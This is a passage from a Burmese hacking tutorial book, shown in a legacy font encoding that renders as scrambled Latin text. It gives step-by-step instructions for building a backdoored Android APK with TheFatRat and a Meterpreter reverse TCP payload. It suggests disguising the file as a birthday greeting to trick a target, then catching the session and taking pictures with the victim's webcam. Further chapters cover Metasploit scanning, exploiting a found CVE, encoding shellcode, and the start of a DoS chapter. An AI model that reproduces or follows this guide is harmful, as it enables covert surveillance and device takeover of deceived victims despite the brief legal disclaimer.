toHk;jyKEdkifygw,f/ owdxm;zdkYu zdkifemrnfudk udk,foHk;&vG,fr,fh space
rjcm;wJhzdkif jzpfatmif cP ajymif;xm;Edkifygw,f/ aemufu .apk udkawmh
rajymif;&bl;aemf/ Oyrm - Facebook.apk ponfjzifhaygh/ jyD;&if tay:yHktwdkif;
zdkifvrf;aMumif; ay;vdkufvdkY &ygjyD/
wu,fvdkY pm&IolwdkYu Downloads folder xJrSm abc.apk zdkifav;
&Sdw,f qdkygpdkY/ 'gudk oHk;r,fqdk&if /root/Downloads/abc.apk vdkY zdkifvrf;aMumif;
ay;&rSmyg/ vrf;aMumif;&kdufwJhtcg zdkifemrnfawG tMuD;tao; tm;vHk; rSefuefzdkY
vdktyfygw,f/
 aemufwpfqifhuawmh uRefawmfwdkYtaeeJY Payload a&G;cs,f&rSm
jzpfygw,f/ yHkrSmMunfh&if payload 6ckudk awGYjrif&ygr,f/

uRefawmfuawmh tcp port 1234 udk forward vkyfxm;wmrdkYvdkY android/

meterpreter/reverse_tcp udk oHk;ygr,f/ Options 3 jzpfwmaMumifh txufygtwdkif;
3 udk a&G;cs,fvdkufygw,f/

aemufwpfqifhuawmh apk zefwD;zdkY tool a&G;cs,fcdkif;wmyg/ toifh

Backdoor-apk xufpm&if uRefawmfuawmh old Fatrat method udkyJ
a&G;vdkufygw,f/ 2 yg/

jyD;oGm;jyDqdk&ifawmh txufygyHkpHtwdkif; listener zefwD;rvm;vdkY

ar;ygvdrfhr,f/ y vdkufyg/

xGufvmr,fh zdkifemrnf ar;wJhtqifh a&mufygjyD/ rdrdESpfouf&mudk

space rjcm;bJ ay;yg/ uRefawmfuawmh Birthday vdkY ay;vdkufygw,f/ (.apk
xnfhay;p&mrvdkyg/)
 'Dzdkifav;udk Birthday vdkY ay;xm;ovdk uRefawmf toHk;jyKcJhwJh apk
uvnf; Happy_Birthday.apk jzpfwmaMumifh arG;aeYvufaqmifqdkjyD; wpfenf;
enf;eJY uRefawmfh&JU target xH ay;ydkYvdkuf&Hkyg/ txufyg yHkrSmawmh uRefawmfwdkY apk
twGuf listener zdkifudk b,frSm&Sdw,fqdkwm jyxm;ygw,f/ enter
aemufwpfcsufqif;vdkuf&ifawmh Fatrat &JU main menu udk jyefa&mufoGm;rSmyg/

uRefawmfwdkY zefwD;vdkufwJh zdkifav;onf Home/TheFatRat/backdoored

qdkwJh folder awGxJrSm app_backdoored.apk qdkwJhemrnfeJYyJ tjrJ awGY&rSmyg/
tJonfrSm rddrd ESpfouf&m emrnfudk ajymif;vdkY&ygjyD/ 'Demrnftwdkif;awmh vHk;0
rxm;ygeJY/ uRefawmfuawmh Happy Birthday.apk vdkY ay;vdkufygjyD/ Right
click >> rename eJY ajymif;wmjzpfjyD; space jcm;vnf; &oGm;ygjyD/ .apk udkawmh
rz,f&bl;aemf/

Fatrat
&JU main menu rSm Options 9 udk a&G;cs,fjyD; msf xJudk
qufvuf 0ifa&mufvdkufygw,f/

msf > xJrSmawmh use multi/handler udk oHk;vdkufygw,f/

 a&SUrSm payload a&G;cs,fcJhwkef;u android/meterpreter/reverse_tcp udk
a&G;cs,fcJhwm rSwfrdOD;r,f xifygw,f/ tJonftwdkif; set payload vkyf&ygw,f/
txufygyHktwdkif;aygh/

LHOST eJY LPORT udk owfrSwfay;wmyg/ (tprSmuwnf;u

uRefawmfhtaeeJY tcp port 1234 udk forward vkyfxm;wJhtaMumif; ajymjycJhjyD;jyD
aemf/)

tm;vHk; toifhjzpfjyDrdkY pwif exploit vdkY &ygjyD/

victim uvnf; apk install jyD;jyD? meterpreter session wpfckvnf; &jyD

rdkY uvdvdkY &ygjyD/ ? av;&dkuf enter jyD; toHk;jyKEdkifr,fh command awGudk &SmazG
MunfhEdkifygw,f/

erlem command tenf;i,fyg/ check_root eJY root vkyfxm;jcif; &Sd r&Sd

ppfaq;EdkifjyD; webcam_snap eJY uifr&mudk toHk;jyKum victim &JU yHk&dyfudk &,ljcif;
yg/ zkef;eJY rsufESmcsif;qdkifaerS vlyHkygrSmyg/ b,frSm b,femrnfeJY odrf;w,fqdkwm
azmfjyxm;wmrdkYvdkY &SmjyD; zGifhEdkifr,f arQmfvifhygw,f/
'Doifcef;pm&JU t"du &nf&G,fcsufuawmh rdrdwdkYtaejzifh apk rsm;udk
tvG,fwul a'gif;,ljyD; xnfhoGif;jcif; rjyKMuzdkY? ,HkMunfpdwfcs&ol xHrS r[kwfbJ
tjcm;olawGqDuae Zapya av;zGifhjyD; ul;ay;ygOD;qdkwmawG rvkyfzdkY pwJh
oifcef;pmawG ,lwwfapzdkYyg/ rdrd&JU udk,fa&;tcsuftvufawG aygufMum;cH&jcif;
vnf; raumif;ovdk tjcm;olawGudk xdkodkYaom tjyKtrlrsdK; usL;vGefjcif;onf
vnf; Cyber Law t& jypfrIajrmufygw,f/
'D tcef;udkawmh 'Dae&mrSmyJ ed*Hk;csKyfyg&apcifAsm/ aemufxyf Chapter
wpfckrSm qufjyD; aqG;aEG;Mu&atmifyg/
CHAPTER 24: Metasploit

Introduction

Hacking avhvmaeolawGtaeeJY Metasploit qdkwmudk

Mum;zl;MujyD;om;awGcsnf;vdkY xifygw,f/ Metasploit Project onf uGefysLwm
vHkjcHKa&; pDrHcsufwpfck jzpfjyD;awmh vHkjcHKa&;qdkif&m tm;enf;csufawGudk
azmfjyay;ygw,f/ Penetration Testing twGuf &nf&G,fxkwfvkyfcJhayr,fh
Hacking (Attacking) tool awGudk toHk;jyKEdkifwmaMumifh malicious user awGuyg
toHk;jyKvmMuygw,f/

Metasploit Pro Metasploit Framework qdkjyD; ESpfrsdK;&Sdygw,f/ Pro

eJY
udkawmh 0,foHk;&rSmjzpfjyD; Free Trail taeeJYvnf; &,loHk;MunfhEdkifygw,f/
'gayr,fh uRefawmfwdkYu ckrS Metasploit udk poHk;rSmjzpfvdkY Pro udk 0,f,lxm;p&m
rvdkao;ygbl;/ Kali Linux rSm build-in yg0ifjyD;om;jzpfwJh Metasploit
Framework udk wdkuf&dkuftoHk;jyKEdkifrSm jzpfygw,f/
Open source jzpfjcif;? Nessus & Nexpose wdkYvdk Powerful scanner
awG&JU result awGeJY wGJpyftoHk;jyKEdkifjcif;? payload aygif;rsm;pGm yg0ifaejcif;
pwJhtcsufawGu Metasploit udk toHk;jyKol rsm;apwJhtcsufawG jzpfygw,f/ Kali
Linux rSmawmh Metasploit yg0ifjyD;jzpfwmrdkY Terminal uae msfconsole udk
&dkufxnfh&HkeJY ac:oHk;EdkifrSmjzpfygw,f/

Working with Scanners

 msf > qdkwmav; jrif&jyDqdk&ifawmh Metasploit Framework Console
xJ a&muf&SdjyD jzpfygw,f/ Metasploit plugin awGudk toHk;jyK&mrSm tqifajyapzdkY
msfconsole eJY ac:roHk;rD service postgresql start vkyfay;zdkY vdktyfygw,f/
bmaMumifhvJqdk&if Metasploit onf PostgreSQL udk olY&JU database tjzpf
toHk;jyKxm;vdkY jzpfygw,f/ ('Dawmh service postgresql start jyD;rS msfconsole udk
ac:oHk;&if ydkjyD; aumif;w,faygh)/

Metasploit Plugin wpfckjzpfwJh wmap udk erlem ac:jyxm;ygw,f/

msf> xJ a&mufrS ac:vdkY&rSmaemf/
 pluginawG ac:jyD;wJhtcg txufygtwdkif; help udk toHk;jyKjyD;
command awGeJY olwdkY&JU azmfjycsufawGudk avhvmEdkifygw,f/

wmap_sites -a http://IP_Address eJY site wpfck zefwD;vdkufwmyg/

site list eJY Available site awGudk azmfMunfhEdkifygw,f/

wmap_targets udk toHk;jyKjyD; tay:yHkrSm ygwJh 192.168.43.150 udk

target xJ jznfhoGif; owfrSwfvdkufwmyg/

owfrSwfxm;wJh target list udk MunfhzdkYtwGuf wmap_targets -l udkoHk;jyD;

MunfhEdkifygw,f/ (target uawmh uRefawmfwdkY jznfhoGif;xm;oavmufyJ
awGY&rSmyg)/

uRefawmfwdkY target (remote system) udk scan vkyfr,fh module awGudk

list xkwfMunfhvdkygu -t udk toHk;jyKEdkifygw,f/
 -e udk oHk;jyD; WMAP eJY scan pwifEdkifygjyD/ Screenshot
tjynfhtpHkudkawmh azmfrjyawmhyg/ rdrdwdkY network xJrSm prf;Munfhjcif;tm;jzifh
ydkjyD; em;vnfvmygvdrfhr,fcifAsm/

Scan rSm &&Sdvmr,fh Vulnerability awGudk list vkyfMunfhEdkifygw,f/

wmap_vulns -l udk toHk;jyK&rSmjzpfygw,f/ uRefawmf ckoHk;oGm;wmav;awGudk
Munfh&if wmap_sites, wmap_targets, wmap_run, wmap_vulns qdkwmawGudk
awGY&rSmyg/ aemufu options wpfckpDudk od&Sdvdkygvsifawmh -h udk toHk;jyK &SmazG
Edkifygw,f/ Oyrm - wmap_sites -h, wmap_run -h, etc

'ghjyif Scanning Tool wpfckjzpfwJh Nexpose eJY Scan zwfxm;wJh Output

Result xml zdkifudkvnf; msf rSm input vkyf toHk;jyKEdkifygao;w,f/ txufyg
OyrmrSmawmh system > root > Nexpost xJrSm&SdwJh report.xml qdkwJh zdkifav;udk
db_import command udktoHk;jyKjyD; xnfhoGif;jyay;xm;ygw,f/

tvm;wlygyJ/ Nessus eJY Scan zwfxm;jyD; Output rSm .nbe eJY

odrf;xm;wJh zdkifawGudkvnf; db_import eJY xnfhoGif;toHk;jyKEdkifygw,f/

tay:yHkrSm awGY&SdcJhwJh Services port awG wpfckcsif;pDtvdkuf Vulns

udkvnf; txufygyHktwdkif; vulns -p (port number) yHkpHeJY &SmazGEdkifygw,f/

vulns (IP) -p (port) yHkpHeJYvnf; &SmazGEdkifygw,f/

 &SmazGvdkufwJhtcg txufygyHkpHav;twdkif; CVE-2010-2075 udk
awGYw,f qdkygpdkY/

txufygtwdkif; search cve: udk toHk;jyKjyD;awmh CVE number tvdkuf

Exploit awGudk &SmazGMunfhwJhtcg yHkxJrSm awGY&wJhtwdkif; Backdoor Command
Execution wpfckudk awGYvdkuf&ygw,f/

'gqdk&ifawmh awGYvmwJh exploit udk use vdkY &jyDaygh/

exploit vdkufygjyD/

txufygtwdkif; session wpfck yGifhoGm;jyDjzpfvdkY terminal command

awG toHk;jyKjyD; arTaESmufvdkY &jyD jzpfygw,f/

Metasploit Fundamentals
MSF Console
msfconsole onf Metasploit Framework &JU vlBudKufrsm;qHk; interface
wpfckjzpfygw,f/ MSF xJrSm &SdorQ feature awGudk wpfae&mwnf;uae
pkpnf;oHk;pGJEdkifatmif pDpOfxm;wJhtjyif MSF &JU Stable tjzpfqHk; interface
wpfckvnf; jzpfygw,f/
 msf xJrSmyJ ping vdk command awGudkvnf; toHk;jyKEdkifygw,f/

cgwdkif;vdk pmawGtrsm;BuD;ay:vmwmrssdK; rvdkcsif&ifvnf; -q

xnfhoGif;jyD; quiet mode eJY toHk;jyKEdkifygao;w,f/

command awG rodwmrsdK;? rrSwfrdwmrsdK;&Sd&if help eJY jyef&SmMunfh

Edkifygw,f/

'ghjyif tpodjyD; payload arhaewmrsdK;awGtwGufvnf; Tab key udk

ESdyfESdyfjyD; oufqdkif&mawGudk a&G;cs,f MunfhEdkifygw,f/

Active exploit awGonf oufqdkif&m host awGay: Exploit vkyfrSm

rjyD;rcsif; Run ygw,f/ Background taeeJY Run apcsif&ifawmh -j udk
jzpfjyD;
xnfhoGif;oHk;&ygr,f/

txufyg Oyrmu Active Exploit udk erlem azmfjywmyg/ Active

 Passive vmOD;rSmaygh/
jyD;awmh xHk;pHtwdkif;
Passive Exploit uawmh incoming host awGudk apmifhjyD; connect
vkyfvmwJhtcg exploit vkyfygw,f/

enumerate vkyfEdkifr,fh shell awGudk list xkwfMunfhcsif&ifawmh sessions

-l
udk toHk;jyKEdkifjyD;awmh session awGudk a&G;cs,f&ifawmh sessions -i (ID) yHkpHeJY
toHk;jyK&rSmjzpfygw,f/

txufyg OyrmrSm attacker &JU malicious website udk victim ra&muf

rcsif; exploit rvkyfygbl;/
Payloads
Metasploit rSm payload qdkwm exploit module awGudk qdkvdkygw,f/
metasploit rSm Payload module oHk;rsdK; awGY&jyD;awmh singles, stagers eJY stages
wdkYyJ jzpfygw,f/ Payload types awGt& ajymjy&&ifawmh Inline (Non Staged)
Payload rSm owfrSwfwm0efudk vkyfaqmifzdkYtwGuf full shell code eJY exploit awG
yg0ifaeygw,f/ Inline payload awGrSm all in one (tm;vHk;yg0ifjyD;om;)
jzpfwmaMumifh counterpart awGxuf ydkjyD; stable jzpfygw,f/ owfrSwf
vkyfaqmifcsufawGudk vkyfaqmifEdkifzdkY&mtwGuf stage payload awGeJY qufpyf
vkyfaqmifwmuawmh Stager payload awG jzpfMuygw,f/ attacker eJY victim Mum;
communication channel wpfck xlaxmifjyD; remote host ay: execute
vkyfEdkifr,fh Stage payload udk 0ifa&muf zwf&IEdkifygw,f/
Meterpreter uawmh Meta-Interpreter udk twdkaumuf toHk;jyKxm;
wm jzpfjyD; dll injection uaewpfqifh vkyfaqmifEdkifapr,fh multi-faceted
payload wpfck jzpfygw,f/ Meterpreter onf remote host &JU memory xJrSm
&SdaejyD; Hard Drive ay:uae rnfonfhvrf;aMumif;rQ rusefapbJ
xGufcGmEdkifygw,f/ CFT (Conventional Forensic Techniques) awGeJY od&SdzdkY
cufcJapjyD;awmh scripts & plugins awGudkvnf; vdktyfovdk ajymif;vJoHk;pGJEdkif
ygw,f/ PassiveX uawmh outbound firewall awG&JU uefYowfcsufawGudk
a&SmifvGJ&mrSm ulnDEdkifygw,f/ ActiveX control udk toHk;jyKjyD; hidden jzpfae
atmif vkyfaqmifEdkifovdk HTTP request & response awGudk vkyfaqmifEdkifapzdkY
attacker eJY qufoG,frIay;Edkifygw,f/
NX uawmh No eXecute yg/ tcsdKUaom memory ae&mawGrSm code
execute vkyfjcif;awGuae umuG,fay;EdkifzdkY CPU awGxJrSm wnfaqmufxm;wJh
feature wpfckjzpfygw,f/ Windows awGrSm NX udk Data Execution Prevention
(DEP) tjzpf toHk;jyKxm;ygw,f/ Metasploit rSmawmh tqdkyg DEP udk
a&SmifuGif;EdkifzdkYtwGuf zefwD;xm;wJh payload awG&Sdygw,f/ NoNX vdkY
ac:ygw,f/
aemufwpfckuawmh Ord yg/ Ordinal payloads udk ajymwmjzpfjyD;
odomwJh tm;omcsufawG tm;enf;csufawG aygif;pyfyg0ifaewJh Windows stager
based payload awG jzpfygw,f/ tm;omcsufawGuawmh Windows 9x vdk
a&S;uswJh pepfawGrSm vkyfaqmifEdkifpGrf;&SdjyD; tvGefYtvGef qdk'fao;i,fvSygw,f/
odkYaomfvnf; tm;enf;csuftcsdKUaMumifh Default choice taeeJY rvkyfaqmifEdkif
jyefygbl;/ yxrwpfcsufu exploit rjyKvkyfrD exploit jyKvkyfr,fh vkyfief;pOfrSm
ws2_32.dll udk loaded vkyfxm;jcif;&Sdr&Sday: rlwnfwmaMumifh jzpfjyD; 'kwd,
tm;enf;csufwpfcku tjcm;aom stager awGxuf stable ydkif;rSm ydkjyD; tm;enf;vdkY
jzpfygw,f/
IPv6 network awGay:rSm vkyfaqmifcsufawG vkyfaqmifcsif&ifawmh
Metasploit IPv6 payloads awGudk toHk;jyKEdkifygw,f/ aemufqHk;wpfckuawmh
Reflective DLL injection yg/ host Hard Drive udk xdawGYjcif;r&SdapbJ memory
xJrSm run aewJh process awGxJudk stage payload awGudk inject vkyfwJh enf;pepf
wpfckvdkY rSwf,lEdkifygw,f/ 'gawGuawmh Types of Payloads awGudk tusOf;csKyf
azmfjycJhjcif;om jzpfygw,f/

Generating a Payload for Metasploit

Metasploit payload awGudk msfconsole xJrSmwif jyKvkyfEdkifaMumif;
uRefawmfwdkY od&SdjyD;jzpfygw,f/ Payload tcsdKUudk toHk;jyKwJhtcg Metasploit onf
"generate", "pry" eJY "reload" command awGudk xyfxnfhvkyfaqmifygw,f/
erlemav; wpfck Munfh&atmifyg/

toHk;jyKcJhwJh command awGu azmfjyaqG;aEG;jyD;om;rdkY xyfrajymjyawmh

bl;aemf/

msf xJrSm windows payload awGxJu shell_bind_tcp payload udk

erlem oHk;jyxm;ygw,f/ qufvufvkyfaqmifEdkifr,fh command awGudk odvdkygu
xHk;pHtwdkif; help av;&dkufjyD; ac:MunfhEdkifygw,f/
 tqdkyg payload xJurS generate options udk a&G;cs,fvdkufygw,f/
bmvkyf&rSef;rod&if aemufrSm -h av;xnfhjyD; tultnDac:Edkifygao;w,f/

uRefawmfuawmh bm options rS xyfrxnfhawmhbJ generate

vdkufygw,f/ txufygyHkrSm Munfhr,fqdk&ifawmh null byte (\x00) qdkwJh bad
character yg0ifaewmudk awGY&rSmyg/ tcsdKUaom exploit awGrSmawmh 'gudk
toHk;jyKcGifh jyKxm;ygw,f/ (qdkvdkwmu oHk;vdkY&ygw,f)/ 'gayr,fh trsm;BuD;awmh
r[kwfygbl;/ wpfcsdefwnf;rSmyJ 'D shell code awGudk generate vkyfjyD; rvdktyfwJh
unwanted byte awGudk remove (z,f)ypfzdkY Metasploit udkyJ toHk;jyKvkyfaqmif
Edkifygao;w,f/

ckyHkrSmMunfh&ifawmh \x00 awG rawGY&awmhygbl;/ -b eJY unwanted byte

awGudk z,fxkwfvdkufwmyg/ yHk2yHk aocsm,SOfMunfh&ifudk jrifomygw,f/ null byte
awGudk atmifjrifpGm z,fxkwfjyD;jyDaygh/ 'Dvdkvkyfaqmifvdkufjcif;tm;jzifh null byte
uif;wJh payload wpfckudk wnfaqmufEdkifjyDjzpfygw,f/ aemufwpfck jrifomwm
u yxryHkrSmMunfh&if 328 bytes om &SdjyD; z,fxkwfxm;wJh 'kwd,yHkrSmawmh 355
bytes jzpfaewmudk awGY&ygr,f/ uGmjcm;csuf 27 bytes jzpfygw,f/ (yHkawG&JU
'kwd,aMumif;rSmyg)

bytes trsm;pkudk z,fxkwfjyxm;wmyg/ 'Davmufqdk null bytes awG

other unwanted bytes awGudk b,fvdk z,fxkwf&r,fqdkwm em;vnfr,f
xifygw,f/ tjcm; character awG roHk;bJeJY shell code awGudk generate vkyfEdkifwJh
pGrf;&nf[m 'D metasploit framework &JU tm;omcsufyg/ 'gayr,fh 'DvdkvkyfEdkifpGrf;
onf tuefYtowfrJhawmh r[kwfygbl;/ atmufygyHkudk qufMunfhyg/

rvdktyfwJh bytes awG odyfrsm;vmwJhtcg metasploit rSm txufyg yHkxJ

u twdkif; Payload generation failed: No encoders encoded the buffer
successfully. qdkwJh message udk awGYjrif&ygvdrfhr,f/
Payload awGudk zefwD;&mrSm taumif;qHk; encoder awGudk a&G;cs,favh
&Sdygw,f/ metasploit uyJ tvdktavsmuf a&G;cs,fay;oGm;wmyg/ odkYaomfvnf;yJ
metasploit u xifjrifwJhyHkpHudk *&krpdkufbJ tcsdKUaom yHkpHawGudk toHk;jyKzdkY
vdktyfvmwJh tcsdefawG &Sdygw,f/ alphanumeric vdkYac:wJh udef;*Pef;eJYpm
wGJxm;wJh character awG r[kwfwJh character awGeJYom exploit vkyfvdkY&r,fh
tajctaewpfckudk pdwful;eJY jrifa,mifMunfhyg/ 'DtajctaersdK;rSmawmh
shikata_ga_nal vdk encoder onf oifhavsmfrSm r[kwfygbl;/ encoder list rSm
Munfhr,fqdk&if x86/nonalpha encoder wpfck yg&Sdaewmudk awGYEdkifygw,f/

show encoders udk toHk;jyKjyD; encoder awG? rank awGeJY azmfjycsufawG

udk zwf&IavhvmEdkifygw,f/ uRefawmfuawmh x86/nonalpha qdkwJh encoder udk
awGY vdkufygjyD/

encoder xnfhoHk;rSmrdkY options tjzpf -e udk toHk;jyKcJhwmyg/ uJ

'Dcgawmh 'DtcsufawG tm;vHk; aygif;pyfjyD; vkyfaqmifMunfh&atmif/ 1. -b eJYvnf;
null byte z,fr,f/ 2. -e eJYvnf; encoder a&G;cs,fr,f/ 3. -f udk oHk;jyD; file
taeeJYvnf; xkwfMunfhr,f/ 'DoHk;csufudk aygif;jyD; vkyfaqmifMunfh&atmif/

'DyHkrSm uRefawmf oHk;oGm;wmu generate -b '\x00' 'Dtydkif;awGu a&SUrSm

ajymjycJhjyD;ygjyD/ -e rSmawmh encoder taeeJY x86/shiKata_ga_nai udk toHk;jyK
xm;ygw,f/ -f taeeJYuawmh Desktop ay:rSm filename.txt taeeJY odrf;vdkufyg
w,f/ filename ae&mrSm rdrdBudKufwmudk xnfhoGif;Edkifygw,f/

NyD;&ifawmh Desktop ay:rSm uRefawmfwdkY zefwD;vdkufwJh txt zdkif

a&mufaejyDjzpfvdkY txufygyHkxJutwdkif; rdrd ESpfouf&m program awGeJY
zGifhMunfhEdkifygw,f/ cat uawmh command line xJrSmyJ zGifhMunfhwmyg/
usefwmawGu GUI awG jzpfygw,f/
Scanning in Metasploit

uRefawmfwdkYtaeeJY nmap udk msf twGif;rSmvnf; toHk;jyKEdkifygw,f/

Nmap uawmh tm;vHk; odjyD;jyDjzpfvdkY txl;taxG razmfjyawmhygbl;cifAsm/
Scanning tcef;rSmvnf; yg0ifjyD;jzpfygw,f/

txufyg yHkxJutwdkif; search portscan udk toHk;jyKjyD; Port scan

awGudk &SmazGEdkifygw,f/ txufygyHkxJu 5 aMumif;ajrmuf module options udk
toHk;jyKjyygr,f/
 toHk;jyKr,fqdk&if use aygh/ vG,fygw,f/ bmqufvkyf&rSef;rod&if
xHk;pHtwdkif; help wdkY show options wdkYudk ac:MunfhEdkifygao;w,f/

show options ac:MunfhwJhtcg Current column rSm uGufvyf

jzpfaewmawGudk Munfhyg/ INTERFACE eJY RHOSTS awGrSm uGufvyf
jzpfaewmudk awGY&ygw,f/ tJ'gawGudk t&ifqHk; wyfqifyg/ set

uRefawmfuawmh wifi connection toHk;jyKxm;wmjzpfvdkY INTERFACE

rSm wlan0 xnfhvdkufygw,f/ BudK;eJYoHk;&if eth0 xnfh&ygr,f/ RHOSTS
ae&mrSmawmh IP udk wpfckwnf;r[kwfbJ twGJvdkuf /24 eJY xnfhfxm;wm
awGY&ygr,f/ r run cif enf;enf; xyfjyif&atmif/ show options xyfac:Munfh/
 txufygtwdkif; current rSmawmh pHkoGm;ygjyD/ 'gayr,fh PORTS
qdkwJhae&mrSm port 1 uae 10000 xd jzpfaew,f/ t&rf;rsm;awmh Mumr,f/
uRefawmfu port 80 wpfcktwGufyJ vdkcsifw,fqdk tJ'gudk jyif&rSmaygh/
aemufwpfcku THREADS wpfckwnf; jzpfaewm/ uRefawmfu 50avmuf
xnfhoGif;r,f/ 'Dawmh 'gvnf; wyfqif set zdkY vdkw,faygh/

owdxm;&rSmu INTERFACE, PORTS, RHOSTS, THREADS

tm;vHk;onf pmvHk;tBuD;rsm; jzpfaewmyg/ &dkufwJhtcg tydktvdk r&SdygapeJY/ uJ
run MunfhMupdkY/
 uRefawmfwdkY scan r,fh network xJrSm &SdaewJh tajctaeay: rlwnf jyD;
&vmwJh result onf wlnDrSmr[kwfyg/

tjcm;aom scan rsm;udkvnf; tvm;wl vkyfaqmifEdkifrSmjzpfygw,f/

Finding Vulnerable MSSQL systems in Metasploit

search mssql udk toHk;jyKjyD; msf xJrSm toHk;jyKEdkifr,fh module awGudk

&SmazGEdkifygw,f/
 auxiliary/scanner/mssql/mssql_ping udk toHk;jyKvdkufygw,f/

xHk;pHtwdkif; show options azmfMunfhwJhtcg RHOSTS ae&mrSm

uGufvyf jzpfaewm awGY&ygr,f/ required column rSm yes vdkY a&;xm;wmu
rjzpfrae jznfh&r,fvdkY qdkvdkwmyg/ uGufvyf jzpfaewmcsif;twlwl PASSWORD
rSmu required column rSm no jzpfaewJhtwGuf user & password rjzpfrae vdkwJh
tajctaeu vGJ&if xm;cJhEdkifygw,f/

RHOSTS owfrSwfjyD; exploit vdkufygw,f/

msf uae sniffer udkvnf;yJ toHk;jyKEdkifygao;w,f/

 msf xJrSmyJ snmp twGuf exploit awGudk &SmazG oHk;Edkifygw,f/

Database command awGudk od&Sdvdkygu msf xJrSm help database vdkY

azmfMunfhEdkifjyD; command column atmufu command awGudk
toHk;jyKEdkifygw,f/ www.offensive-security.com/metasploit-unleashed rSm
wpfckpDtaMumif; tao;pdwf azmfjycsufav;awGudk zwf&IavhvmEdkifrSm
jzpfygw,f/ Facebook Group rSmvnf; Group File tjzpf zwf&IavhvmoifhwJh
pdf aygif;rsm;pGmudk yHhydk;ay;oGm;ygOD;r,f/ Metasploit taMumif; tjynfhtpHk
azmfjyzdkYawmh pmrsufESmtajctaet& tqifrajywmaMumifh avhvmEdkifr,fh
vrf;p rsm;udkom azmfjyay;xm;jcif;jzpfygw,f/ Port Forwarding tcef;rSmvnf;
metasploit taMumif; xyfrH yg&SdvmOD;rSmjzpfygw,fcifAsm/
CHAPTER 25: DoS & DDoS Attacks

Introduction

DoS eJY DDoS qdkwmudkawmh tm;vHk; Mum;odzl;Muwmcsnf;ygyJ/

Denial-of-Service (DoS) eJY Distributed Denial-of-Service (DDoS) awGonf
wdkufcdkufrIawGxJrSm trsm;qHk; awGY&Sd&wJh wdkufcdkufrItrsdK;tpm;jzpfjyD; aeYpOf
jzpfay:vsuf &Sdygw,f/ ynm&Siftrsm;pkuawmh DoS eJY DDoS Attack wdkYudk
hacking qdkwJh acgif;pOfatmufrSm rxm;&SdMuygbl;/ System Break Down jzpfapzdkY
t"du vkyfaqmifwJh DoS attack awGudk vkyfaqmifEdkifzdkY skill &Sdp&mrvdkbJ
vkyfEdkifwmaMumifh jzpfygw,f/ 'gayr,fh attack vkyf&wmjzpfaewmaMumifh
hacking xJrSm ygoifhw,fvdkY tcsdKUu qdkMuygw,f/ bmyJjzpfjzpf uRefawmfwdkY
avhvmMunfh&atmifyg/
Denial-of-service onf IT resource awG&JU pGrf;aqmifrIay:
rlwnfwdkufcdkufwJh attack wpfrsdK; jzpfygw,f/ resource vdkY qdk&mrSm server awG?
uGefysLwmawG? euf0yfqdkif&m ud&d,mawG? software/application awG? website
awG pwmawGjzpfygw,f/ wdkufcdkufrI&JU &nf&G,fcsufuawmh w&m;0if (yHkrSef)
toHk;jyKolawGtzdkY umvwdk (odkYr[kwf) umv&Snf 0ifa&mufoHk;pGJvdkY r&Edkifatmif
[efYwm;vdkwJh &nf&G,fcsuffrsdK; jzpfygw,f/ DoS attack wpfckrSm attacker
awGtaeeJY illegitimate (w&m;r0if) odkYr[kwf unsolicited (jyKjyifzefwD;xm;aom
yHkrSefr[kwfonfh) request awG odkYr[kwf heavy traffic awGeJYtwl target udk flood
(vQH) oGm;atmif zefwD;wm jzpfygw,f/
'Dvdkvkyfaqmifvdkufjcif;tm;jzifh target &JU resource awGudk 0efydoGm;ap
jyD; yHkrSef oHk;pGJolawGtwGuf 0efaqmifrI ray;Edkifawmhygbl;/ uGefysLwmuae
udkifwG,fajz&Sif;EdkifwJh request yrmPxuf ydkrdkrsm;jym;wJh request awGudk
ay;ydkYvdkufjcif;tm;jzifh xdk request awGu uGefysLwm&Sd CPU awG memory
resource awGudk tvHk;pHk toHk;jyKvdkufwJhtwGuf legitimate user qdkwJh yHkrSef
w&m;0if oHk;pGJolawGtwGuf bm resource rQ rusefatmif vkyfaqmifjcif;
jzpfygw,f/
jrifomatmif Oyrmav;wpfck ajymjycsifygw,f/ zkef;qufrSm&HkeJY
tdrfta&muf vmydkYay;wJh MuufaMumfqdkifav;wpfqdkif &Sdw,f qdkMuygpdkY/ xdkqdkifrSm
zkef;qufrSm,lEdkifr,fh BudK;zkef; ESpfvHk; &Sdw,fqdkygpdkY/ 'Dae&mrSm rormolwpfOD;u
pufu&d,m wpfckck tultnDeJY zkef;wpfvHk;udk wpfcsdefvHk; qufoG,faejyD;
vdkif;rtm;atmif vkyfxm;vdkufw,fqdkygawmh/ BudK;zkef; ESpfvHk; &SdwJhqdkifrSm zkef;
wpfvHk;u bmrQ oHk;r&bJjzpfaecsdefrSm wpfbufu customer awGuvnf;
zkef;ESpfvHk;udk rQ qufae&mu wpfvHk;u r&awmhwJhtwGuf usefwpfvHk;wnf;udk
pkjyD; ac:qdkMu&wmaMumifh qdkif&JU service onf Muyfwnf;oGm;jyD; wcsdKUwpf0uf
om a&mif;cs&awmhrSmjzpfvmygw,f/ Customer awGbufuMunfh&ifvnf;
rSm,lzdkYtwGuf zkef;quf&mrSm ,cifu wpfBudrf (odkYr[kwf) ESpfBudrf quf&HkeJY
zkef;0ifwmrsdK; jzpfayr,fh attack umvtwGif;rSm oHk;Budrf av;Budrf qufvm&
ygawmhw,f/ oHk;av;Budrfxufru qufoG,fvm&wJhtcg azmufonfawGu
tjcm; vG,fulwJh qdkifqD ajymif;rSmvdkufMuwJhtwGuf azmufonfawGyg
qHk;&IH;&ygawmhw,f/
'Dtajctaeudk qdkifu od&SdoGm;jyD; block jzpfaewJh BudK;zkef;udk ppfaq;wJh
tcg tajctaeudk odoGm;w,fqdkygpdkY/ 'gqdk caller ID machine awGudk wyfqifzdkY
BudK;pm;&ygawmhr,f/ jyD;awmh b,feHygwfawGu olwdkYudk taESmifht,Sufay;aevJ
odatmifvkyfjyD; xdkeHygwfawGudk black list vkyfypf&awmhrSmjzpfygw,f/ 'gayr,fh
'Dvkyfaqmifcsufonf a&&SnftwGuf tajzawmh r[kwfao;ygbl;/ a&wdkom
ajz&Sif;EdkifrSmyg/ bmaMumifhvJqdk&if attacker u tjcm;eHygwfawGudk ajymif;vJvm
EdkifwJhtwGuf jzpfygw,f/ a&&SnftwGufawmh Long term strategy qGJjyD;
aqmif&GufzdkY vdktyfrSmjzpfygw,f/
Denial-of-Service onfvnf; xdkoabm vkyfaqmifyHkeJY wlnDygw,f/
target company &JU IT device awGeJY service awG&JU pGrf;aqmif&nfudk usqif;oGm;
atmif odkYr[kwf &yfwefYoGm;atmif vkyfaqmifwm jzpfygw,f/ xdkodkY aqmif&Guf
&mrSm attacker &JU pufwpfvHk;wnf;uaejzpfap? xdk attacker xdef;csKyfxm;aom
